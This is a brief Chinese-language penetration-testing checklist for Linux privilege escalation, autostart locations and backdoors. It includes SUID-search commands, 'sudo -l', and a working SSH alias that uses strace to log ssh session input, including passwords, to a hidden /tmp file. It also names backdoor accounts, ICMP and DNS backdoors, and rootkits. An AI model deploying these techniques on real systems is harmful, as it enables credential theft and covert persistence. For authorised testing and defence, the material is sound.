持久化 ======================================== 权限提升 ---------------------------------------- - 内核漏洞利用 - 攻击有root权限的服务 - 利用第三方服务提权 - 通过有SUID属性的可执行文件 - 查找可能提权的可执行文件 - ``find / -perm +4000 -ls`` - ``find / -perm -u=s -type f 2>/dev/null`` - ``find / -user root -perm -4000 -print 2>/dev/null`` - ``find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null`` - 利用可用的root权限 - ``sudo -l`` - 利用误配置的 crontab 任务 自启动 ---------------------------------------- - /etc/init.d - /etc/rc.d/rc.local - ~/.bashrc - ~/.zshrc 后门 ---------------------------------------- - ssh 后门 - ``alias ssh='strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh'`` - 后门账户 - 常见应用 - ICMP - DNS - icmp后门 - 后门端口复用 - ``.`` 开头隐藏文件 - rootkit